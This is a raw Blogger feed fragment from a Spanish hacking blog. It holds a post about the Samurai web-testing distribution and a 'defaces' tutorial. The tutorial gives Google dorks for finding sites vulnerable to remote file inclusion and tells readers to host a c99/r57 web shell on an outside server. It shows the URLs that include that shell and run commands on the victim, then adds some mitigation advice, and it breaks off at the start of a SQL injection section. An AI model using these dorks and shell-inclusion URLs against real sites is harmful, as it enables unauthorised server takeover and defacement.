underline;"&gt;Fierce domain Scanner&lt;/span&gt; y &lt;span style="text-decoration: underline;"&gt;Maltego&lt;/span&gt;. Para el mapeo del sistema objetivo incluye la herramienta &lt;span style="text-decoration: underline;"&gt;WebScarab&lt;/span&gt; y &lt;span style="text-decoration: underline;"&gt;Ratproxy&lt;/span&gt;. Para el &lt;span style="text-decoration: underline;"&gt;decubrimiento de vulnerabilidades&lt;/span&gt; incluye w3af y &lt;span style="text-decoration: underline;"&gt;burp&lt;/span&gt;, finalmente para el proceso de explotación utiliza &lt;span style="text-decoration: underline;"&gt;BeEF&lt;/span&gt;, &lt;span style="text-decoration: underline;"&gt;AJAXShell&lt;/span&gt; y otras más.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;span id="more-1252"&gt;&lt;/span&gt;Como si esto fuera poco, Samurai Framework incluye una wiki preconfigurada y lista para ser usada como bitácora de recolección de la información que vamos generando a medida que avanzamos en el proceso de pen-testing.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Los desarrolladores hacen anuncio oficial de la disponibilidad de esta primera distribución como versión de desarrollo y hacen la invitación a los interesados a participar de este genial proyecto, ofrecen para ello un sitio &lt;a href="http://samurai.intelguardians.com/" target="_blank"&gt;Web&lt;/a&gt; y una &lt;a href="https://sourceforge.net/mail/?group_id=235785" target="_blank"&gt;lista de correo&lt;/a&gt;.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Para finalizar dejo algunas capturas de pantalla de lo que he probado a manera “superficial” sin entrar aún mucho en el detalle de uso y comportamiento del sistema (hasta el momento va muy bien). Quiero además hacer la salvedad que estas mismas herramientas pueden ser instaladas y configuradas en diferentes S.O, por lo tanto una vez más queda comprobado que no importa el S.O que utilicemos, todos pueden servir para las diferentes tareas de nuestro día a día, incluso para estos menesteres de la seguridad &lt;img src="http://www.dragonjar.org/wp-includes/images/smilies/icon_wink.gif" alt=";)" class="wp-smiley" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" /&gt; &lt;/p&gt; &lt;p style="text-align: justify;"&gt;Booteo de Samurai Web Testing Framework&lt;/p&gt; &lt;p&gt;&lt;a href="http://img258.imageshack.us/img258/4732/booteoaf7.jpg" target="_blank"&gt;&lt;img src="http://img258.imageshack.us/img258/4732/booteoaf7.th.jpg" alt="booteoaf7.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Cargando y reconociendo componenetes y hardware&lt;/p&gt; &lt;p&gt;&lt;a href="http://img213.imageshack.us/img213/8725/cargandoeg8.jpg" target="_blank"&gt;&lt;img src="http://img213.imageshack.us/img213/8725/cargandoeg8.th.jpg" alt="cargandoeg8.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Inicio de sesión (contraseña para root)&lt;/p&gt; &lt;p&gt;&lt;a href="http://img213.imageshack.us/img213/5207/loginfr2.jpg" target="_blank"&gt;&lt;img src="http://img213.imageshack.us/img213/5207/loginfr2.th.jpg" alt="loginfr2.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Escritorio (Gnome)&lt;/p&gt; &lt;p&gt;&lt;a href="http://img213.imageshack.us/img213/938/desktopzn0.jpg" target="_blank"&gt;&lt;img src="http://img213.imageshack.us/img213/938/desktopzn0.th.jpg" alt="desktopzn0.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Menú Samurai (Herramientas)&lt;/p&gt; &lt;p&gt;&lt;a href="http://img139.imageshack.us/img139/7199/menufx6.jpg" target="_blank"&gt;&lt;img src="http://img139.imageshack.us/img139/7199/menufx6.th.jpg" alt="menufx6.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Navegador (Add-ons incluídos: Edit cookies, DOM Inspector, Firebug, Greasemonkey, HackBar, Header Spy, SQL Injection, etc)&lt;/p&gt; &lt;p&gt;&lt;a href="http://img139.imageshack.us/img139/5461/navegadorro2.jpg" target="_blank"&gt;&lt;img src="http://img139.imageshack.us/img139/5461/navegadorro2.th.jpg" alt="navegadorro2.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Herramienta WebScarab&lt;/p&gt; &lt;p&gt;&lt;a href="http://img222.imageshack.us/img222/6360/webscarabxr2.jpg" target="_blank"&gt;&lt;img src="http://img222.imageshack.us/img222/6360/webscarabxr2.th.jpg" alt="webscarabxr2.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Terminal&lt;/p&gt; &lt;p&gt;&lt;a href="http://img222.imageshack.us/img222/254/terminalvk9.jpg" target="_blank"&gt;&lt;img src="http://img222.imageshack.us/img222/254/terminalvk9.th.jpg" alt="terminalvk9.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Wiki incluida y pre-configurada&lt;/p&gt; &lt;p&gt;&lt;a href="http://img222.imageshack.us/img222/5999/wikipx2.jpg" target="_blank"&gt;&lt;img src="http://img222.imageshack.us/img222/5999/wikipx2.th.jpg" alt="wikipx2.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Ejecución del instalador a disco duro&lt;/p&gt; &lt;p&gt;&lt;a href="http://img222.imageshack.us/img222/8468/instaladorww5.jpg" target="_blank"&gt;&lt;img src="http://img222.imageshack.us/img222/8468/instaladorww5.th.jpg" alt="instaladorww5.th Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" title="Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" border="0" /&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;a href="http://samurai.intelguardians.com/" target="_blank"&gt;Web oficial del Proyecto Samurai Web Testing Framework&lt;/a&gt;&lt;br /&gt;&lt;a href="https://sourceforge.net/project/showfiles.php?group_id=235785&amp;amp;package_id=286383&amp;amp;release_id=618972" target="_blank"&gt;Descargar Samurai Web Testing Framework&lt;/a&gt; (&lt;a href="http://ufpr.dl.sourceforge.net/sourceforge/samurai/samurai.iso" target="_blank"&gt;Directa&lt;/a&gt;)&lt;br /&gt;&lt;a href="http://comunidad.dragonjar.org/index.php/board,10.0.html" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-5797149592831021252?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/5797149592831021252/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/samurai-entorno-de-trabajo-para-el.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5797149592831021252'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5797149592831021252'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/samurai-entorno-de-trabajo-para-el.html' title='Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-3251954327153053061</id><published>2008-12-17T14:26:00.000-08:00</published><updated>2009-01-26T11:07:12.426-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>Introducción Defaces</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:180%;"&gt;INTRODUCCIÓN DEFACES&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Quiero dar un pequeña introducción antes de explicar tipos de defaces y como proteger una pagina.&lt;br /&gt;Una deface es mediante un bug del codigo de una pagina web conseguir hacer lo que te propones a esa pagina web, redireccionarla a otra web, robo de cookies, modificación de información ...&lt;br /&gt;Explicaré 3 tipos de defaces:&lt;br /&gt;RFI (Remote file inclusion)&lt;br /&gt;XSS (Cross site scripting)&lt;br /&gt;SQL injection&lt;br /&gt;&lt;br /&gt;Explicaré cada tipo, pondré un ejemplo de su uso, y intentaré demostrar formas de protección ante esos tipos de ataques.&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Unix)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 2cm } 		P { margin-bottom: 0.21cm } 		A:link { so-language: zxx } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0cm;" align="center"&gt;&lt;span style="font-size:6;"&gt;TUTORIAL RFI &lt;/span&gt; &lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="center"&gt;por iLuN&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="center"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;	Este tutorial ha sido hecho por iLuN para el blog de &lt;a href="http://pirates-of-the-routers.blogspot.com/"&gt;http://pirates-of-the-routers.blogspot.com&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;	No me hago responsable de los actos que hagais mediante los conocimientos adquiridos con este tutorial. Este tutorial es solo educativo nada mas.&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;	&lt;u&gt;&lt;b&gt;1.- Que es RFI?&lt;/b&gt;&lt;/u&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 		La tecnica de RFI (Remote file inclusion) consiste en explotar una vulneravilidad de PHP por un fallo de programación en el codigo. La inclusión de ficheros suele exportarse mediante el metodo GET y el metodo POST, los cuales son metodos de transferencia de datos al servidor web donde esta alojada la pagina.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; La manera de saber si la pagina está usando un metodo GET es viendo en la barra de direcciones del navegador algo parecido a esto:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 				&lt;a href="http://www.pagina.com/archivo.php?var1=dato1"&gt;http://www.pagina.com/archivo.php?var1=dato1&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; Normalmente el error en la programación viene dado al utilizar la función include de PHP.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 						Include “fichero”;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; Esta explicación deja las cosas un poco sueltas, pero ahora lo veremos mejor.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;u&gt;&lt;b&gt;2.- Manos a la obra con RFI&lt;/b&gt;&lt;/u&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Lo primero que hay que hacer es buscar una web vulnerable a RFI, para ello en google ponemos las siguientes busquedas o similares, por ejemplo:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;i&gt;default.php?page= inurl:"default.php?page="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;i&gt;	folder.php?id= inurl:"folder.php?id="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;i&gt;	index.php?Load= inurl:"index.php?Load="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;i&gt;	index.php?Language= inurl:"index.php?Language="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;i&gt;	hall.php?file= inurl:"hall.php?file="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;i&gt;	hall.php?page= inurl:"hall.php?page="&lt;/i&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Lo siguiente es asegurarse de que la pagina es vulnerable a RFI, para ello en la url insertamos otra url, es decir:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 		&lt;a href="http://www.webvuln.com/index.php?Load=www.google.es"&gt;http://webvuln.com/index.php?Load=&lt;/a&gt;&lt;u&gt;&lt;b&gt;&lt;a href="http://www.webvuln.com/index.php?Load=www.google.es"&gt;www.google.es&lt;/a&gt; &lt;/b&gt;&lt;/u&gt; &lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Lo que acabamos de hacer es insertar en la url de la web vulnerable otra direccion, si la pagina de google carga, la web es vulnerable.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Vale, pero direis que con esto no conseguimos gran cosa, pero y si insertamos la url de una shell que tengamos alojada en otro servidor?. Una shell lo que nos permite es poder ejecutar comandos en el servidor de la web vulnerable, con lo que podrias hacer mucha pupita.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; Las shell que uso son las siguientes:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 					c99, c100 y r57&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Vale, repasemos. Una vez descubramos la pagina vulnerable a RFI tenemos que subir o tener subida un shell (c99,c100,r57...) a un servidor, es muy muy muy importante que subamos la shell con extension txt, para que no se ejecute en nuestro servidor donde tenemos la shell.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Ahora tenemos que atacar la pagina vulnerable de la siguiente manera:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;a href="http://webvuln.com/index.php?Load=http://servidordelashell/shell.txt"&gt;[http://webvuln.com/index.php?Load=&lt;/a&gt;&lt;a href="http://webvuln.com/index.php?Load=http://servidordelashell/shell.txt"&gt;&lt;u&gt;&lt;b&gt;http://servidordelashell/shell.txt]&lt;/b&gt;&lt;/u&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	ejemplo:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;a href="http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt"&gt;[http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt]&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Si queremos ejecutar directamente un comando pondriamos lo siguiente:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;a href="http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt&amp;amp;&amp;amp;cmd"&gt;[http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt&amp;amp;&amp;amp;cmd&lt;/a&gt;&lt;a href="http://www.webvuln.com/index.php?Load=http://iLuN.com/c99.txt"&gt;="comando"]&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	Es importante saber que la mayoria de los webmasters protegen sus paginas contra este tipo de ataques. Ahora explicare la forma de proteger una pagina a RFI.&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;u&gt;&lt;b&gt;3.-Proteger la pagina a RFI&lt;/b&gt;&lt;/u&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	El texto que a continuación os presento es un post de un usuario (en este caso moderador global) del foro de el hacker, si quereis ver pinchar en el siguiente enlace:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; 	&lt;a href="http://foro.el-hacker.com/index.php/topic,145634.0.html"&gt;[http://foro.el-hacker.com/index.php/topic,145634.0.html]&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; ManCuerTex:&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; “&lt;span style="font-size:85%;"&gt;&lt;i&gt;Pues una de las soluciones mas sencillas del mundo, es crear un mini filtro, para decirle a nuestra página, que secciones pueden pasar por la variable sección.&lt;br /&gt;&lt;br /&gt;Es tan facil como crear un array y indicarle las páginas.&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;b&gt;Ejemplo:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;[$seccion=array("info.html", "index.html", "seccion2.html");&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Otro filtro que es el que sea usa mucho, es el deshabilitar los dos puntos (&lt;img src="http://www.el-hacker.com/foro/Smileys/default/smiley.gif" name="gráficos1" alt="Smiley" align="bottom" width="15" border="0" height="15" /&gt; en las variables de entrada como $seccion.&lt;br /&gt;&lt;br /&gt;¿Para que queremos que se use el caracter de los dos puntos?&lt;br /&gt;&lt;br /&gt;Para nada, no nos puede traer nada bueno, ya que lo utilizan los atacantes para poner HTTP://&lt;br /&gt;&lt;br /&gt;Así que creamos otro minifiltro para prohibir los (&lt;img src="http://www.el-hacker.com/foro/Smileys/default/smiley.gif" name="gráficos2" alt="Smiley" align="bottom" width="15" border="0" height="15" /&gt; dentro de la variable.&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;b&gt;Ejemplo:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;br /&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;i&gt;&lt;br /&gt;Bueno, es tan facil como eso.&lt;br /&gt;&lt;br /&gt;Y como último, opción preventiva, que a veces puede causar la incompatibilidad en algunas configuraciones.&lt;br /&gt;&lt;br /&gt;Vamos al archivo php.ini y modificamos el valor "allow_url_fopen", lo dejamos a "0".&lt;br /&gt;&lt;br /&gt;Esto del php.ini no se puede modificar en la mayoría de servidores, ya que los servidores que se contratan, ya tienen sus propias políticas de seguridad, y tienen el archivo php.ini configurado como ellos quieren, por eso lo he puesto en el final y sin mucha importancia. Porque metiendo los filtros aquí dichos en nuestra página, ya podemos decirle Adios al RFI.”&lt;/i&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-style: normal; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;span style="font-size:100%;"&gt;	Me parece interesante el aporte de ManCuerText, por su claridad y su entendimiento. Como acabais de leer la solucion al RFI no es complicada de entender, ahora para proteger vuestras paginas de RFI esta en vuestras manos.&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-style: normal; font-weight: normal; text-decoration: none;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0cm; font-weight: normal; text-decoration: none;" align="left"&gt; &lt;span style="font-size:100%;"&gt;&lt;span style="font-style: normal;"&gt;Esto ha sido todo :) Nos vemos en el proximo tutorial.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;em&gt;&lt;/em&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;                                TUTORIAL XSS&lt;br /&gt;                                   por iLuN&lt;br /&gt;&lt;br /&gt;        Por razones curiosas, pero ciertas no puedo postear aquí este tutorial. La razon? xD Blogspot es vulnerable a XSS, me di cuenta ayer cuando lo postee. La solución que se me a ocurrido es subir el manual a rapidshare. El problema es que esta en .odt formato de open ofice asi que pongo aqui un link donde lo prodreis pasar a formato de word. Merece la pena ver el tuto.&lt;br /&gt;&lt;br /&gt;DESCARGAR TUTORIAL -----&gt; http://rapidshare.com/files/189803049/XSS.odt.html&lt;br /&gt;&lt;br /&gt;CONVERSOR -----&gt; http://www.zamzar.com/conversionTypes.php#documents&lt;br /&gt;                 http://media-convert.com/conversion/&lt;br /&gt;&lt;br /&gt;Las dos paginas son muy buenas. Ya me fastidia lo ocurrido, haber si lo arreglan pronto jaja porque yo mismo conozco la pereza de tener que bajarselo y convertilo. Pero bueno he dado las mayores comodidades que he podido ya lo siento :) Pero la culpa la tiene google jajajaja.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;                 &lt;br /&gt;                              TUTORIAL SQL INJECTION BASICO&lt;br /&gt;                                          por iLuN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;	1.-Introducción&lt;br /&gt;&lt;br /&gt;	SQL injection es un tipo de ataque con el que se pretende sacar información o modificarla de una base de datos. Este ataque se aprobecha del filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL.&lt;br /&gt;&lt;br /&gt;	Como siempre la explicación es un poco abstracta asi que lo vereis mejor en el transcurso de l tutorial.&lt;br /&gt;&lt;br /&gt;	Solo explicar a los que no sepan lo que es SQL, que es un lenguaje de manipulación de datos de una base de datos, digamos que con SQL hacemos consultas a una tabla, creamos tablas … para mas información esta San Wikipedia.&lt;br /&gt;&lt;br /&gt;	Para que cojais una idea los que nunca habeis visto el lenguaje SQL que una sentencia facilita es de este pelo:&lt;br /&gt;&lt;br /&gt;			select * from usuarios where nombre='admin';&lt;br /&gt;&lt;br /&gt;	Lo que decimos es que seleccione todo (*) de la tabla usuarios donde el nombre (campo de esa tabla) es admin. Esto nos daria toda su información, 